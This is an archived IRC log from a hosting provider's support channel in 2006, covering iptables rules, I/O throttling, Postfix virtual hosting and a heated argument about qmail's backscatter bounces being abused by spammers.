19:38<@mikegrb>and then cat cmdline
19:39<@mikegrb>thoth39: it hasn't started
19:39<thoth39>er.
19:39<cow>mikegrb: i killed the bash process as soon as i saw it spawn
19:39<efudd>last is your friend
19:39<thoth39>No? I remember testing one once. Was this super secret? :D
19:40<@mikegrb>efudd: there was no login so no entry in wtmp/utmp
19:40<efudd>wheeee
19:40<efudd>get him off my host. :)
19:40<efudd>(if he is there)
19:42<efudd><- paranoid android
19:46<cow>argh... gotta see gh
19:46<cow>gf
19:54|-|rafa [~rafa@tdev129-158.codetel.net.do] has joined #linode
19:56<@mikegrb>mmm cake
19:56<rafa>hi..mike or cake?
20:02|-|rafa [~rafa@tdev129-158.codetel.net.do] has quit [Quit: rafa]
20:04<npmr>my gf has a cat named cow
20:20|-|Dreamer3 [~dreamer3@0-1pool145-219.nas72.chicago3.il.us.da.qwest.net] has quit [Quit: Leaving]
20:21|-|sprouse [~sprouse@pcp0012075917pcs.whtmrs01.md.comcast.net] has joined #linode
20:27|-|sprouse [~sprouse@pcp0012075917pcs.whtmrs01.md.comcast.net] has quit [Quit: sprouse]
20:31<taupehat>oh well
20:31<taupehat>http://oddbox.org/~sam/cat.jpg
20:42|-|spr [~spr@ramona.cs.byu.edu] has quit [Quit: Spoon!]
20:48|-|MrJonK [~43895ce9@linode.com] has joined #linode
21:05|-|Dreamer3 [~dreamer3@0-1pool144-253.nas72.chicago3.il.us.da.qwest.net] has joined #linode
21:27|-|thoth39 [~hm@200216048126.user.veloxzone.com.br] has quit [Quit: Leaving]
21:52|-|alex323 [alex@ool-4573a33d.dyn.optonline.net] has joined #linode
21:52|-|FireSlash [~FireSlash@0-1pool125-154.nas19.kansas-city2.mo.us.da.qwest.net] has quit [Ping timeout: 480 seconds]
21:56|-|MJK [~43895ce9@linode.com] has joined #linode
21:57|-|Netsplit arion.oftc.net <-> venus.oftc.net quits: J[SS]
21:57<MJK>how can I kick the old sessions from this chat?
21:57<MJK>Using the cgi from the website, but keep losing connect.
21:57<alex323>MJK: Gotta wait for it to ping timeout if you haven't registered your nickname.
21:58|-|Netsplit over, joins: J[SS]
21:58<MJK>Must take quite a while. Been a couple of hours so far.
21:58<MJK>NBD...it'll go away eventually
21:58<alex323>Hours?
21:58<alex323>It should take 5 minutes.
21:59<MJK>Nope, both of the other ones that start with "M" in the list are mine that died
21:59<MJK>must think I'm still alive since I keep logging back in.
22:00<MJK>should die off when I take a nap....
22:00|-|FireSlash [~FireSlash@0-2pool55-203.nas23.kansas-city2.mo.us.da.qwest.net] has joined #linode
22:05|-|Battousai [~bryan@24.115.192.241.res-cmts.sth.ptd.net] has quit [Quit: KVIrc 3.2.0.99 'Marmalade']
22:19|-|mindmime [~matto@202.80.145.26] has joined #linode
22:19<mindmime>any linode staff around?
22:23<MJK>I've got an iptables question. Any volunteers?
22:24<@mikegrb>mindmime: yes
22:24<@mikegrb>MJK: shoot
22:24<MJK>I have my default input polity set to deny
22:24<MJK>and have these two rules in there
22:25<MJK>-A INPUT -m state --state ESTABLISHED -j ACCEPT
22:25<MJK>-A INPUT -m state --state RELATED -j ACCEPT
22:25<MJK>good thing?
22:25<MJK>and this one: -A INPUT -p tcp -m tcp --tcp-flags ACK ACK -j ACCEPT
22:25<MJK>polity=policy
22:26<@mikegrb>you aren't doing any serving?
22:26<@mikegrb>I think you've got it covered
22:26<MJK>yes, but those have their own holes
22:26<MJK>further down the chain, I have -A INPUT -p tcp -m tcp --dport 80:81 -j ACCEPT
22:26|-|spr [~spr@c-24-10-236-93.hsd1.ut.comcast.net] has joined #linode
22:27|-|tibbetts [~chatzilla@pcp05307748pcs.wanarb01.mi.comcast.net] has joined #linode
22:27<MJK>I noticed that if I have an ssh session running, then lock myself out, the session keeps going. Kinda cool, but odd
22:27<MJK>It must be considered "related"
22:28<MJK>or "established"
22:29<tibbetts>Is there someplace that lists how the io_tokens refill scales with the various linode plans?
22:30<@mikegrb>tibbetts: same values
22:30<tibbetts>Huh, so the only io benefit would be more buffer cache/less swapping due to having more ram?
22:31<@mikegrb>tibbetts: the average io_rate across all linodes is around 10/sec, so a refill of 512 tokens/sec and 400000 to go through before being throttled, the token limiter is rarely a problem unless something is broken
22:32<tibbetts>interesting. I guess I should debug harder then.
22:33<@mikegrb>you've got quite a bit of swap in use
22:33<@mikegrb>that is likely the problem
22:33<@mikegrb>look at your apache and mysql configs for starters
22:33<@mikegrb>the default configs assume you have at least half a gig of ram
22:34<tibbetts>Well, I'm using neither mysql nor apache, but I get the idea. I think I have too many fastcgi workers going.
22:34[~]MJK has default configs on those...more load will probably kill the 80 I have.
22:34<@mikegrb>yeah, your average since boot is 2 io ops/sec
22:35<@mikegrb>but you've been doing quite a bit of io lately it looks like
22:35<tibbetts>Yeah, occationally I get spidered and things go badly
22:35<tibbetts>so you are right that I should look at my configs, not the specs of the machine.
22:36<@mikegrb>looks like you are quite alright steady state
22:36<@mikegrb>I ended up blocking everyone but google bot in my robots.txt
22:36<@mikegrb>yahoo and msn both have pretty bad behaved spiders
22:37<MJK>mikegrb: can you please kick my other two dead sessions: MrJohnK & MrJonK? My browser had crashed....
22:38<@mikegrb>MJK: only method to get rid of old cgi::irc processes is to restart the webserver, which would take out you too
22:38<@mikegrb>w
22:46<tibbetts>Ok, knocking max fastcgi workers down from 10 to 2 seems to make the site not hose the machine.
22:49<taupehat>any spider named "slurp" can't be something I want to let into my site...
22:50<taupehat>I let them look at the front page, all of which is plastered with "rel=nofollow"
22:50<taupehat>or used to be...
22:50[~]taupehat upgraded recently
22:55<@mikegrb>http://www.sophos.com/pressoffice/news/articles/2006/01/dirtdozjan05.html
22:57<taupehat>and how many of those relays run billg's software, I wonder
22:58<taupehat>wait, no I don't
22:59|-|VS_ChanLog [~stats@ns.theshore.net] has left #linode [Rotating Logs]
22:59|-|VS_ChanLog [~stats@ns.theshore.net] has joined #linode
22:59<@mikegrb>and qmail
22:59<[|^__^|]>ha ha qmail
22:59<MJK>we need "eye for a spam" and to offer gov't sponsered anti-spam software for everyone. We be better spent money than on legislation.
22:59<taupehat>mikegrb has a secret love affair with qmail
22:59<@mikegrb>qmail and exchange always top backscatter reports
23:00<MJK>qmail is cool
23:00<[|^__^|]>qmail is *abandonware*
23:00<@mikegrb>qmail is utter crap
23:00<taupehat>I've been on the receiving end of that backscatter, and I have to agree
23:00<[|^__^|]>and an amazingly efficient source of spam
23:00<@mikegrb>yes
23:00<taupehat>aside from windows malware, I reckon you just can't top unpatched squirrelmail implementations for spam volume
23:01<MJK>sendmail is overbloated and is a constant source of bugs
23:01<@mikegrb>other then challenge response spam, the only other backscatter complaints we've had had all been qmail users
23:01<@mikegrb>MJK: qmail and sendmail are not the only choices
23:01<[|^__^|]>MJK: no one will contest that. Sendmail is oooold news
23:01<@mikegrb>and are about equals
23:01<MJK>agreed
23:01<taupehat>postfix, anyone?
23:01<[|^__^|]>postfix postfix postfix postfix
23:01<taupehat>dovecot exim and friends
23:01<[|^__^|]>sure
23:02<MJK>been using qmail for about 10 years. broke my teeth on it running my ISP and never stopped using it.
23:02<@mikegrb>and there hasn't been a new qmail release in 7
23:02<taupehat>MJK: that code hasn't been patched in about as long, too
23:02<internat>yeah i use postfix
23:02<@mikegrb>or 8 now?
23:02<internat>with virtual stuff
23:02<[|^__^|]>MJK: arguing that qmail is good to run because it's better than sendmail is like arguing that you should use 8-tracks because they're better than wax cylinders
23:02<[|^__^|]>while completely ignoring LPs, CDs, etc
23:03<taupehat>hmm
23:03<taupehat>where would exchange fit in that model [|^__^|]
23:03<@mikegrb>[|^__^|]: more like arguing wax cylinders rather then the metal disc thingies in jukeboxes
23:03<MJK>I can tell that I'm constantly out of style around here. As long as I'm happy, I really don't give two craps what you guys thing.
23:03<MJK>think
23:03<taupehat>good answer =]
23:03<@mikegrb>no, bad answer
23:03<taupehat>well
23:04<@mikegrb>the fact that you run qmail and it will eventually case linode ips to be added to blocklists affects all linode customers
23:04<taupehat>I don't have to run a box he's running qmail on so it's no skin off me
23:04<MJK>If I get hacked, feel free to kill my account and keep my money
23:04<@mikegrb>you don't have to be hacked
23:04<MJK>or spammed relayed or whatever you want to call it
23:04<@mikegrb>and when not if
23:05<taupehat>MJK: all I ask is that you turn off that stupid fucking autoreply to bad recipient that doesn't bother to check the IP of the sender to see if it matches the domain of the sender
23:05<taupehat>'scuse the language
23:05<MJK>it's not like I run an open relay or something.
23:05<@mikegrb>software that actively scans for qmail and exchange servers to exploit for backscatter spamming exists
23:05<@mikegrb>MJK: no but qmail is just as bad
23:06<@mikegrb>MJK: as you can't prevent it via config
23:06<@mikegrb>it's a fact of life for qmail
23:06<taupehat>you mean he can't turn off the autoreply spam?
23:07<@mikegrb>the way qmail acts is fundamentally flawed and is not fixable via a config file
23:08<MJK>And what wonderful new style of the month email server do you recommend?
23:08<@mikegrb>postfix or exim
23:08<taupehat>btw
23:08<MJK>then next year, I can learn yet another one when those are found out to cause spam or cancer
23:08<taupehat>mikegrb is never this opinionated
23:08<@mikegrb>just about anything other then qmail, exchange or lotus notes
23:09<@mikegrb>MJK: those are still maintained
23:09<@mikegrb>MJK: qmail hasn't been maintained in 8 years
23:09<@mikegrb>"it's done, there are no more bugs, this is the last release ever"
23:09<MJK>understandable, but I have not had a bit of trouble with it since 1996 either
23:09<@mikegrb>but you have been inflecting trouble on others
23:09|-|emcnabb [~emcnabb@adsl-69-238-24-205.dsl.scrm01.pacbell.net] has quit [Ping timeout: 480 seconds]
23:10<@mikegrb>do you enjoy receiving spam?
23:10<MJK>at the time, I maintained 8,000 mail accounts and tracked down spammers (my own customers) on a daily basis
23:10<@mikegrb>if so, then fine, if not, then why would you chose to inflect it on others?
23:10<MJK>never had an instance of spam that I could not account for.
23:10<taupehat>MJK: as an experiment
23:10<taupehat>use your home computer
23:10<@mikegrb>less then 0.001% of spam is reported
23:11<taupehat>to send a mail to an invalid recipient on your qmail server
23:11<taupehat>give your gmail address as the sending address
23:11<taupehat>behold: spam!
23:11<MJK>If I send mail to something that isn't in the rcpthosts, it just sends one back saying so. is that what you are referring to?
23:11<taupehat>yes
23:12<taupehat>it trusts the "Mail from:" command to tell the truth
23:12<MJK>what is the problem with that?
23:12<@mikegrb>ha ha
23:12<@mikegrb>and you don't see a problem?
23:12<taupehat>hehe
23:12<taupehat>apparently not
23:12<@mikegrb>obviously you should read up on how email is /supposed/ to work
23:12<taupehat>owch
23:12<taupehat>anyhow
23:12<@mikegrb>djb doesn't do things how they are supposed to be done
23:12<@mikegrb>he does them however is easiest
23:12<taupehat>I'll give a recent example I had to deal with
23:13<MJK>k
23:13<taupehat>Some jerkoff did a big spam run, used my email address in the "MAIL FROM:" header
23:13<taupehat>had nothing to do with me
23:13|-|FireSlash [~FireSlash@0-2pool55-203.nas23.kansas-city2.mo.us.da.qwest.net] has quit [Read error: Connection reset by peer]
23:13<MJK>Yes, not all that uncommon really. you were just the butt of his spam through an open relay
23:13<taupehat>I received, in the course of about 2 hours, 146 bounce emails from qmail servers.
23:14<taupehat>I had nothing to do with him
23:14<taupehat>not my host relaying the spam
23:14<taupehat>postfix did not spam me back
23:14<taupehat>exim did not spam me back
23:14<npmr>MJK, i've been using postfix as long as you have and it's still in vogue while qmail isn't
23:14<MJK>I agree, still not all that uncommon
23:14<taupehat>exchange _barely_ spammed me back
23:14<taupehat>qmail spammed the hell out of me
23:14<@mikegrb>MJK: the fact that it is not all that uncommon is exactly why you should be using qmail
23:15<taupehat>and shutting down port 25 wouldn't have helped because all those qmail servers would have patiently waited until they could reach me to spam me into the ground
23:15<@mikegrb>should not be rather
23:15<taupehat>see, only qmail and exchange did that
23:15<taupehat>(and a couple of "out of office" replies"
23:15<MJK>anyone can forge the From: and send it through an open relay.
23:15<taupehat>yes
23:15<@mikegrb>no shit shirlock
23:15<npmr>MJK, that's not the point
23:15<taupehat>but only qmail spams back to the from: line
23:15<taupehat>see
23:16<taupehat>all those emails
23:16<taupehat>should have never been sent to me
23:16<taupehat>"Nobody here with that account"
23:16<@mikegrb>MJK: spammers purposefully exploit qmail servers, relying on the broken bounce messages
23:16<npmr>MJK, anyone can forge the From: and get a qmail server to bounce the forged message back to that address
23:16<npmr>MJK, that's just how qmail does things, and it's antiquated
23:16<@mikegrb>MJK: they put the destination address in the from header, and bam your server pushes out a few hundred thousand spam for the spammer
23:16<taupehat>such a slick exploit
23:17<@mikegrb>npmr: it never was ok, antiquated isn't the right word
23:17<npmr>it was common practice, though
23:17<npmr>until it became a liability
23:17<taupehat>hahah
23:17<npmr>now it is antiquated
23:17<taupehat>" Based on your industry status, you're exactly the kind of top-level executive who should be reading every issue of CIO Insight."
23:17<taupehat>go ziffdavis
23:17[~]taupehat runs the network for a small K12 district
23:17|-|emcnabb [~emcnabb@adsl-69-238-24-205.dsl.scrm01.pacbell.net] has joined #linode
23:17<taupehat>CIO, eh?
23:18<taupehat>where's my desk plate?
23:18<taupehat>somone fetch me the brandy cart!
23:20<[|^__^|]>http://www.postfix.org/BACKSCATTER_README.html <-- would this help block qmail backscatter spam?
23:20|-|Netsplit arion.oftc.net <-> venus.oftc.net quits: J[SS]
23:21<[|^__^|]>hmmm, looks like all the headers in the example are qmail, even though the howto diplomatically avoids mentioning any one single MTA
23:21<[|^__^|]>other than postfix of course
23:21<fo0bar>FYI, magic-smtpd is a complete replacement for the smtpd portion of qmail, and can be configured to only allow addresses at the smtpd level
23:23<fo0bar>that doesn't stop you from RECEIVING backscatter, of course
23:23[~]mikegrb really liked the modified qmail bounce sent to a mailing list
23:24<[|^__^|]>I love how postfix is supposedly just some flavor-of-the-month despite having had more continuous years of development than qmail did
23:24<@mikegrb>they modified their qmail non existant user bounce message to "inform people about the dangers of virus scanners that send a reject message and the backscatter they cause"
23:24<fo0bar>[|^__^|]: but qmail is DONE. don't you see? there's nothing left to develop.
23:24<@mikegrb>I literally fell out of my chair laughing
23:25<npmr>ha ha
23:25<@mikegrb>fo0bar: yes, qmail is obviously better since it was written in a short time period and with no bugs
23:25<[|^__^|]>http://journals.eyrie.org/eagle/archives/000422.html <-- "The main problem is backscatter spam. I've been adding various bogus addresses to qmail to discard all mail to them, but that hasn't kept up with the variety of crap that spammers are trying. As a result, I know I've been accepting a lot of mail and then bouncing it back to the (forged) envelope sender, and have been feeling rather bad about that. Postfix not only lets me ...
23:25<fo0bar>see, mikegrb gets it.
23:25<@mikegrb>fo0bar: postfix obviously sucks and has so many bugs it needs to be continously maintained
23:25<[|^__^|]>... avoid that for local recipients, it lets me avoid that for backup MX hosts as well (by keeping a record of which recipients are valid on the remote system)."
23:27|-|Netsplit over, joins: J[SS]
23:27<internat>ive had no problems with postfix
23:27<MJK>I guess I'll be packing up my outdated bag of tricks into my knapsack and join back up with the gypsies. Glad to see that you all got a good laugh. The old dog with old tricks will now depart. g'night all. Off to find a new mail server...
23:28<[|^__^|]>Yeah, I went to postfix from exim, and I've been delighted
23:28<[|^__^|]>exim4 is amazingly configurable, but I'm very happy with my current postfix setup, despite doing some things in a less clever way (read: more stable in the long run)
23:28<internat>well all my stuff is in mysql tables and stuff and so far ive found postfix has been the nicest when working with that
23:29<internat>ill be happier when courier .5x trickles down into debian testing
23:29<[|^__^|]>MJK: don't feel bad. We regularly get folks who use qmail out of inertia and aren't aware of its flaws. We get a bit aggro because they often try to tell us that we're fools for running sendmail or something, and try to proselytize qmail upon us.
23:30<[|^__^|]>internat: wow, you must have a *huge* mail installation
23:30|-|MJK [~43895ce9@linode.com] has left #linode [bedtime ]
23:31<internat>err is that sarcasim or?
23:31<npmr>postfix does have native mysql table support
23:31<npmr>that doesn't mean you have to use it
23:31<taupehat>heh
23:31<npmr>obviously, it's there because sometimes there's a huge benefit
23:31<taupehat>I'm stuck with the same boondoggle
23:31<internat>i like the support cause then i cause do virtual hosting very simply
23:31<taupehat>postfix+msql
23:31<taupehat>mysql
23:32<taupehat>it was in the howto, and I was in a hurry to implement the mailserver
23:32<taupehat>trying all the "gee whiz" stuff
23:32<internat>if i want to support a new domain load up my pphp form and bam done.. same with accounts
23:32[~]mikegrb has the most simple virtual hosting ever
23:32<[|^__^|]>internat: no, it's just that the use cases for SQL integration into your MTA all involve enormous installations
23:32<@mikegrb>vim /etc/virtual/somedomain.com
23:32<npmr>internat, what mikegrb said
23:32<@mikegrb>internat: intarnat@hisdomain.com
23:32<taupehat>sigh, see. mikegrb knows how to do it
23:32<@mikegrb>:wq
23:32<@mikegrb>done
23:33<taupehat>In my defense, I have to point out that I followed the directions found at the linode forums
23:33<@mikegrb>then the mail server magically knows about the new domain and accepts mail for it
23:33<internat>fair enuff
23:33<[|^__^|]>mikegrb: and if you hash it, it's faster than SQL if you have less than 50k entries or whatever
23:33<[|^__^|]>postmap baby
23:33<@mikegrb>fsck hashing it
23:33<[|^__^|]>oh?
23:33<internat>theres a good tutorial on workarround.org for debian postfix virtual hosting.. i used that and ive never had a problem
23:33<npmr>and also, postmap -q
23:33<npmr>for testing your mappings
23:34<npmr>works also on ldap and mysql tables
23:34<@mikegrb>I don't process more then one message per 10 45 seconds or so on average
23:34<taupehat>so
23:34<taupehat>anyone know how to BACK out of a mysql configuration without losing mail?
23:34<internat>err the mail isnt stalled in mysql
23:34<npmr>set up your replacement dbm tables
23:34<internat>stored*
23:34<npmr>check and recheck them
23:35<npmr>modify your main.cf to use those instead of mysql
23:35<internat>i have my mail stored in /home/hosting/domain.com/mail/user
23:35<npmr>restart postfix
23:35<internat>all thats in mysql is the domains, forwardings, and user accounts
23:36<taupehat>man, the tables are pretty freaking easy right now
23:36<taupehat>*@taupehat.com is aliased to me
23:36<taupehat>a couple of high-hitters are blocked in main.cf
23:36<taupehat>actually, yeah
23:36<internat>yep frankish.com.au auto aliased to nf@our-lan.com
23:37<internat>oh yeah taupehat , i cant get to ur site
23:37<internat>it keeps timing out for me
23:37<taupehat>anything I want dumped goes into recipient_access
23:37<taupehat>oh aye?
23:37<taupehat>it's plenty responsive to me
23:37<npmr>(works for me)
23:37<internat>dont have anything that blocks australian ips or anything do u?
23:37<taupehat>haha
23:37<taupehat>are you serious?
23:37[~]taupehat thinks we've had this discussion before
23:37<internat>nope
23:37<taupehat>oh
23:37<taupehat>right
23:38<taupehat>that's somebody at another channel
23:38<taupehat>what's your broadcast addy
23:38<taupehat>(for those not residing on APNIC space, the goods are at http://www.taupehat.com/index.php?blog=6&p=42&more=1&c=1&tb=1&pb=1#more42 )
23:39<taupehat>I'm thinking I can probably lift that though
23:39<internat>neither of my computers can get to it
23:39<internat>one on westnet.com.au one on optusnet.com.au
23:40<npmr>and from your linode?
23:40<taupehat>greylisting has pretty well solved most of my email spam, and b2evolution has fixed how hit handles large volumes of blog spam traffic so it doesn't thrash the server
23:41<taupehat>internat: your current ip is caught by the 202.0.0.0/7 drop
23:41<taupehat>give it a whirl now
23:41<npmr>go go gadget oz
23:41<taupehat>hehe
23:41<taupehat>poor aussies
23:41<internat>yeah i can get it now
23:41<internat>sif block all of australia :P
23:41<taupehat>got caught in APNIC
23:41<taupehat>heh
23:42<taupehat>was aiming north of you
23:42<npmr>internat, yeah, your country should move further east
23:42<internat>fair enuff
23:42<taupehat>hmm
23:42<npmr>it's in apnic space way over where it is now
23:42<internat>so what was that link to ur xchat stuff again?
23:42<taupehat>haha
23:42<@mikegrb>there are british and american ips under apnic's delegation as well
23:42<taupehat>oh
23:43<npmr>guam and hong kong?
23:43<@mikegrb>no, old stuff
23:43<[|^__^|]>ha ha "Ur Xchat of the Chaldees"
23:43<@mikegrb>moved in one of the old data import initiatives
23:43<internat>ta
23:43<[|^__^|]>note to IRC: "ur" is pronounced "oor"
23:43<taupehat>oh aye
23:43<taupehat>speaking of which
23:44<taupehat>wish I knew what I did with the cable to my camera
23:44[~]taupehat got new license plates today
23:44<taupehat>just today in the mail even =]
23:44<taupehat>think that's at work =|
23:44<npmr>i've only ever seen "ur" used for reasons other than laziness in the hyphenated "ur-web" noun
23:44<npmr>i'm not sure that "ur-web" actually means anything
23:45<npmr>oh wait, mr.bad uses sometimes too, as a prefix
23:45<@mikegrb>npmr: not so much laziness as time managment, they have decided what they are saying isn't worth their time to type
23:46<@mikegrb>npmr: it's quite nice thing for them to do actually, kind of like setting priority to low on an email message
23:46<taupehat>SRSLY
23:46<npmr>ur gy
23:46<@mikegrb>npmr: let's you the reader know that they don't think it is very important so you can skip reading it
23:46[~]taupehat decides to lift his blacklist for a while and watch server load
23:48<taupehat>if I could only remember how do do a while loop right the first time, sigh
23:52|-|mindmime [~matto@202.80.145.26] has quit [Ping timeout: 480 seconds]
23:52<taupehat>ergh
23:55<taupehat>there
23:58<npmr>3gar gar gar
23:58<npmr>charter is really sucking ass right now
23:58<[|^__^|]>Ur is a babylonian name or something, and was the name of the first man in The Source and so on. It usually means the first generation, although I think it was originally the name of a city
23:58<[|^__^|]>it's biblical, anyway
23:59<[|^__^|]>but the hyphenated prefix means "the original, nay, primeval..."
23:59<taupehat>heh
23:59<taupehat>npmr: charter is always sucking ass, btw
23:59<taupehat>w
---Logclosed Wed Jan 25 00:00:17 2006